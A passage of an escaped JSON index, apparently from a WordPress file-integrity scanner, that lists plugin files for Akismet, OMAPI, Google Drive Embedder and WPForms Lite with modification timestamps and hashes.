a4263\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/akismet\\/index.php\":{\"d\":1557884753,\"h\":\"cf6895af2050eb5ae7c0badda2604566\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/akismet\\/class.akismet-rest-api.php\":{\"d\":1557884753,\"h\":\"e2ba85ba3a4be01e8ec837265a394863\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/akismet\\/.htaccess\":{\"d\":1568299062,\"h\":\"bf39be827c95ade49c322dfe231ff19c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/akismet\\/wrapper.php\":{\"d\":1557884753,\"h\":\"10885d78a6229a59978bda1c8aef4b4a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/akismet\\/class.akismet-widget.php\":{\"d\":1557884753,\"h\":\"31164f8db33265318eaefba6724ae06a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/akismet\\/class.akismet.php\":{\"d\":1557884753,\"h\":\"c14834e30543e35b96a04ac4c8687648\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Type.php\":{\"d\":1503576765,\"h\":\"96c3b2cb04be19bdab71703be5524b58\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Ajax.php\":{\"d\":1503576765,\"h\":\"e34ef77c2c3da85d853db72000cf14e9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Shortcode.php\":{\"d\":1503576765,\"h\":\"77280dc91598132d222098da85c50bad\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Migration.php\":{\"d\":1503576765,\"h\":\"22fcf3327620dcd2c2526a918b7c9979\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Actions.php\":{\"d\":1503576765,\"h\":\"eae8065f1e55e98c7b1d50c2a5e56777\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Widget.php\":{\"d\":1503576765,\"h\":\"68b03792f64bc0d288d4c5a2ead4aae8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Api.php\":{\"d\":1503576765,\"h\":\"7addd9d878a765d2de01dc2e8223e6b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Welcome.php\":{\"d\":1503576765,\"h\":\"845e0c4241deb9a3b6c33a2de228b551\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Review.php\":{\"d\":1503576765,\"h\":\"8ecd205f70d60c32ff76ff537c1db381\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Menu.php\":{\"d\":1503576765,\"h\":\"b96613384085119f9efd4ec5b700f91d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Validate.php\":{\"d\":1503576765,\"h\":\"8eef6efa5a26907924098027674f701c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Refresh.php\":{\"d\":1503576765,\"h\":\"8ca2d06917ed6aa521a4ace3fcda2b62\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Output.php\":{\"d\":1503576765,\"h\":\"4fd409ca3dba81aa808dcacb4c26f230\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Save.php\":{\"d\":1503576765,\"h\":\"f7006719e49a088d03a31730bc83c392\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/OMAPI\\/Content.php\":{\"d\":1503576765,\"h\":\"634480f4221e3a596566b49e915fb4f8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/js\\/jquery.colorbox.js\":{\"d\":1559832007,\"h\":\"c3e1c20c59cb74bf7fad0b9a121aebd2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/js\\/gdm-admin-settings-tabs.js\":{\"d\":1559832007,\"h\":\"e1886d2be271fd5369cc1baec815e415\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/js\\/gdm-choose-drivefile.js\":{\"d\":1559832007,\"h\":\"20f58227baddc2e9a4f92365e4e36691\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/js\\/gdm-blocks.js\":{\"d\":1559832007,\"h\":\"12e810b95b8dd155bab6bdf40cc58333\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/js\\/gdm-simple-browser.js\":{\"d\":1559832007,\"h\":\"bd1bf11c73dcfe88b7b06ae2903fa38e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/js\\/gdm-basic-drivefile.js\":{\"d\":1559832007,\"h\":\"be98d9ff8eb7db1a4e9b28de4ec26ac8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/js\\/gdm-base-servicehandler.js\":{\"d\":1559832007,\"h\":\"2047bbde5a4e241aa8842ff1070c5c4a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/core\\/core_google_drive_embedder.php\":{\"d\":1559832007,\"h\":\"6ef96dffbed780ef869626d89c7de0a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/lang\\/google-drive-embedder.pot\":{\"d\":1559832007,\"h\":\"d6782ce1fafa55418989c1a50acfb13a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/css\\/gdm-choose-drivefile.css\":{\"d\":1559832007,\"h\":\"a2d0010800eb2d1acb34851a0fd82f08\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/css\\/gdm-blocks.css\":{\"d\":1559832007,\"h\":\"dd10e79f4cd87b6bd5feb50559342db9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/css\\/gdm-colorbox.css\":{\"d\":1559832007,\"h\":\"77ea9fc22152da38c4ca0328753d8196\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/css\\/gdm-admin-settings.css\":{\"d\":1559832007,\"h\":\"3c96f7cf4d8c1da8a0613fd84858bf5c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/readme.txt\":{\"d\":1559832007,\"h\":\"dc1b626ba3fbcd2487615712d9496eb9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/google-drive-embedder\\/google_drive_embedder.php\":{\"d\":1559832007,\"h\":\"2cd46fb55d54c0221e255e6111f85d24\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/templates\\/emails\\/general-header.php\":{\"d\":1568732563,\"h\":\"5d0860aa17b64eff88a9b72b2043d6d1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/templates\\/emails\\/general-style.php\":{\"d\":1568732563,\"h\":\"cd379da0437eb9e9eada2a1e6bac3e28\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/templates\\/emails\\/summary-body.php\":{\"d\":1568732563,\"h\":\"d3e7c5fa9842f9b0e3579b7348a957aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/templates\\/emails\\/general-footer.php\":{\"d\":1568732563,\"h\":\"12f85b8d35c4d8a926fb106ab49df92f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/templates\\/emails\\/general-queries.php\":{\"d\":1568732563,\"h\":\"b1eaca7e45d6a02b9a2a5e1945d4dfbd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/templates\\/emails\\/summary-style.php\":{\"d\":1568732563,\"h\":\"981b29e13947b95a4c33d43b7f9a0ca3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/templates\\/emails\\/general-body-plain.php\":{\"d\":1568732563,\"h\":\"d79c594b3e79f65b0cd49330dca6bd3e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/templates\\/emails\\/general-body.php\":{\"d\":1568732563,\"h\":\"7fd2ee4a64815459aaf84b91db4f8204\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/templates\\/emails\\/summary-body-plain.php\":{\"d\":1568732563,\"h\":\"629e1f269cab53448556c1e457e4498a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-builder.js\":{\"d\":1568732563,\"h\":\"57b4a3f1b0600d1d2cc3563056e19fe0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-core.js\":{\"d\":1568732563,\"h\":\"733dfd71e7e4ad3f90c51944394a3440\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-embed.min.js\":{\"d\":1568732563,\"h\":\"ab6e2df92f1f3d267c6a3685f6fe9748\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-admin.min.js\":{\"d\":1568732563,\"h\":\"2b5ca4c19b60e56ab4791e46b978dce0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-embed.js\":{\"d\":1568732563,\"h\":\"7287632abce05fb9f0dd412ff84ad3ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-admin.js\":{\"d\":1568732563,\"h\":\"30f44fab7f5c45c00945ce831dc66eaf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-core.min.js\":{\"d\":1568732563,\"h\":\"609b490d81366b1ce805a03d55e45f69\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/challenge\\/challenge-builder.min.js\":{\"d\":1568732563,\"h\":\"e020b81de5fbb14bf09a80ad62b8463f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/builder\\/templates.min.js\":{\"d\":1568732563,\"h\":\"dedcc0688b93747cc03957c0c8c5813b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/builder\\/templates.js\":{\"d\":1568732563,\"h\":\"62a70ef16a8b8a16414c5cc9f136de8e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/builder\\/providers.js\":{\"d\":1568732563,\"h\":\"a63c3f0c13c14da774e3380a687f6c28\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/builder\\/providers.min.js\":{\"d\":1568732563,\"h\":\"124abfc1804b53aeb14d857a3ba85345\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/gutenberg\\/formselector.min.js\":{\"d\":1568732563,\"h\":\"3b9b3ac903abb5a1c786b6b0f6aac68a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/components\\/admin\\/gutenberg\\/formselector.js\":{\"d\":1568732563,\"h\":\"8e5c3e3dfa21e3bf08cac17c3daaf2fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-utils.js\":{\"d\":1568732563,\"h\":\"8f4b7b1622534f99cde5e842eed48ee1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.serialize-object.min.js\":{\"d\":1568732563,\"h\":\"5d873c724a7aa020c96f972a8228005b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.timepicker.min.js\":{\"d\":1568732563,\"h\":\"f4b47962063343eaa3937d960b2752ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/wpforms.js\":{\"d\":1568732563,\"h\":\"0cbeff8b13f9a2039ebf940032c5bd29\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.insert-at-caret.min.js\":{\"d\":1568732563,\"h\":\"2995e0e742a67bf9fc80fcb333c1ecf0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-builder-conditional-logic-core.js\":{\"d\":1568732563,\"h\":\"932fcbc400b6beaaf2bb66f8509993ee\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.tooltipster.min.js\":{\"d\":1568732563,\"h\":\"843b8a8618e600e4071e0e15ed40404a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.validate.js\":{\"d\":1568732563,\"h\":\"66a17e0982c99c9209d7e8a93df7e4ef\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.matchHeight-min.js\":{\"d\":1568732563,\"h\":\"4d9a91bb66cfabd87602261b4b33d26a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-builder.js\":{\"d\":1568732563,\"h\":\"a1713a4fe5feb8ebbe8c0ce4f2bc5158\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin.js\":{\"d\":1568732563,\"h\":\"81a4b8a012f03a65c9c027f171407664\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-builder-providers.js\":{\"d\":1568732563,\"h\":\"80e60af6a4c4fd545baa959fb93da3a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.validate.min.js\":{\"d\":1568732563,\"h\":\"23d73c6bd6cbea8f06d0cc227896a827\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.jquery-confirm.min.js\":{\"d\":1568732563,\"h\":\"7cb6c13bd7fe931f3d0321a83267941c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.minicolors.min.js\":{\"d\":1568732563,\"h\":\"f04b7fe5987fad6f82a71a3a4f2dce51\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/flatpickr.min.js\":{\"d\":1568732563,\"h\":\"1fbcdfe72ccb0a7c24c994559f624db9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/moment.min.js\":{\"d\":1568732563,\"h\":\"8999b8b5d07e9c6077ac5ac6bc942968\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/moment-with-locales.min.js\":{\"d\":1568732563,\"h\":\"a79a8710a3517e497846aca9179f8d81\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/mailcheck.min.js\":{\"d\":1568732563,\"h\":\"84cdf2af726ea0ad5c67b7ec6479e363\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.conditionals.min.js\":{\"d\":1568732563,\"h\":\"5db6700370202c4e745e5241c361d602\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.inputmask.bundle.min.js\":{\"d\":1568732563,\"h\":\"435edaaa333cdec89861580e957b300a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/jquery.payment.min.js\":{\"d\":1568732563,\"h\":\"703593b205e1bac0dd61a47f29796bf9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/chart.min.js\":{\"d\":1568732563,\"h\":\"f6c8efa65711e0cbbc99ba72997ecd0e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/wpforms-confirmation.js\":{\"d\":1568732563,\"h\":\"4e65e14b03416541b8f1afce0bc6cd4e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin-editor.js\":{\"d\":1568732563,\"h\":\"9cdd7d9e89eed10295f5e66564e1834e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/choices.min.js\":{\"d\":1568732563,\"h\":\"d8534d2ae56671c256cde1197b8b0a5f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/admin.min.js\":{\"d\":1568732563,\"h\":\"ed80fcb5a68f5ceb99310118b03e6504\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/js\\/list.min.js\":{\"d\":1568732563,\"h\":\"85f06a1d7d3b386029fc4e3240c5428e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/fonts\\/fontawesome-webfont.ttf\":{\"d\":1568732563,\"h\":\"b06871f281fee6b241d60582ae9369b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/fonts\\/fontawesome-webfont.woff2\":{\"d\":1568732563,\"h\":\"af7ae505a9eed503f8b8e6982036873e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/fonts\\/fontawesome-webfont.woff\":{\"d\":1568732563,\"h\":\"fee66e712a8a08eef5805a46892932ad\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/fonts\\/fontawesome-webfont.eot\":{\"d\":1568732563,\"h\":\"674f50d287a8c48dc19ba404d20fe713\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/emails\\/partials\\/media_queries.min.css\":{\"d\":1568732563,\"h\":\"39e1dc0058216f6be3e7b976db2586fc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/emails\\/partials\\/media_queries.css\":{\"d\":1568732563,\"h\":\"bf34a78920f789ed8c47479ce5909647\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/emails\\/summary.css\":{\"d\":1568732563,\"h\":\"27e39dc94106a07b049d35e993fd8540\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/emails\\/general.css\":{\"d\":1568732563,\"h\":\"2784cd03c1b48c6dcc1ea5bb697ba58c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/emails\\/general.min.css\":{\"d\":1568732563,\"h\":\"429aaf501dbe4692b11d82b6a91c5391\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/emails\\/summary.min.css\":{\"d\":1568732563,\"h\":\"1b34ff0e316ee6324a78f3649dfe1bb4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/dashboard-widget.css\":{\"d\":1568732563,\"h\":\"9d146ee479705acc858369bd854116c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/tooltipster.css\":{\"d\":1568732563,\"h\":\"39f9136a3a74155c5a941431d756c939\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/builder.css\":{\"d\":1568732563,\"h\":\"801649eec43461f3f4a57c0f7074bf7c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/challenge.css\":{\"d\":1568732563,\"h\":\"5f34cceb8a86f3365fe036a14a9f679e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/dashboard-widget.min.css\":{\"d\":1568732563,\"h\":\"6bd147268bcb52c97abc86d5514c532c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/challenge.min.css\":{\"d\":1568732563,\"h\":\"7a8aee8c222993ffd9f8783b89a83465\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/wpforms-base.css\":{\"d\":1568732563,\"h\":\"a58c507c3d095822fead7329b037b393\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin.min.css\":{\"d\":1568732563,\"h\":\"9cda05f9eb3f2c0b8e3a2e7936bc646b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin.css\":{\"d\":1568732563,\"h\":\"10a3f36a35e179dd41fa3392639f2b90\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/wpforms-full.css\":{\"d\":1568732563,\"h\":\"bfd997d91d7c77a735d439b2e0569acc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder-fields.css\":{\"d\":1568732563,\"h\":\"0ad38eebe0da883de8fda21c91457148\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/builder.min.css\":{\"d\":1568732563,\"h\":\"013e0ff7acbef07007ad7de8818e9ff8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/entry-print.min.css\":{\"d\":1568732563,\"h\":\"0a13541efb875560b0d44101c90486e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder-setup.css\":{\"d\":1568732563,\"h\":\"364214765ea1d743c92e3e853b7c53cd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder-providers.css\":{\"d\":1568732563,\"h\":\"71d6041e5de61d07dc0ffb1e3c4a7572\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/jquery.timepicker.css\":{\"d\":1568732563,\"h\":\"cca842fb17ee6b670cbb8544e6921cf2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder.css\":{\"d\":1568732563,\"h\":\"acbfff8fcf75a9f99361d2f76bc7af70\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/font-awesome.min.css\":{\"d\":1568732563,\"h\":\"269550530cc127b6aa5a35925a7de6ce\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/jquery.minicolors.css\":{\"d\":1568732563,\"h\":\"21dc5677b136ee45fb5caf30c1ad7e17\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/admin-builder-conditional-logic-core.css\":{\"d\":1568732563,\"h\":\"3f0e3ea5d4f476a2a9c70ecc190a318a\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/flatpickr.min.css\":{\"d\":1568732563,\"h\":\"2958abbe5a522d59040931486f2f3281\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/entry-print.css\":{\"d\":1568732563,\"h\":\"41ee242d9b575bb42d156e5a5256cff2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/assets\\/css\\/jquery-confirm.min.css\":{\"d\":1568732563,\"h\":\"c2b359a37a11f61270eb852fc4b8f16b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-subscribe.php\":{\"d\":1568732563,\"h\":\"a0f28c27a379698f227d6f0b19478428\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-base.php\":{\"d\":1568732563,\"h\":\"5140ff9f77633f8b95e5e3d99b57667d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-contact.php\":{\"d\":1568732563,\"h\":\"c96478e7f77c4a0fbf6b536804a77746\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-blank.php\":{\"d\":1568732563,\"h\":\"074900cb3089ef87ab1b9983ce32c17f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/templates\\/class-suggestion.php\":{\"d\":1568732563,\"h\":\"8aa5c93594b4ee6c1f46d843e62a7f63\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/providers\\/class-base.php\":{\"d\":1568732563,\"h\":\"2aa63fa8dc690e098b4c8cae191d893d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/providers\\/class-constant-contact.php\":{\"d\":1568732563,\"h\":\"4363150fcef87f7d88531b7a255079f6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/overview\\/class-overview-table.php\":{\"d\":1568732563,\"h\":\"e7036894b7209396d8420ce0b7f178c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/overview\\/class-overview.php\":{\"d\":1568732563,\"h\":\"b9196fd6f189f30b69d1ed751b427fd0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-fields.php\":{\"d\":1568732563,\"h\":\"e6383d82a222ea62ab58500d15b576fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-analytics.php\":{\"d\":1568732563,\"h\":\"6fa177e391c69c53589d808bb0ff72a7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/wpforms-lite\\/includes\\/admin\\/builder\\/panels\\/class-base.php\":{\"d\":1568732563,\"h\":\"10841905acdf3d1d673a0325362ff2e5\"},\"\\/h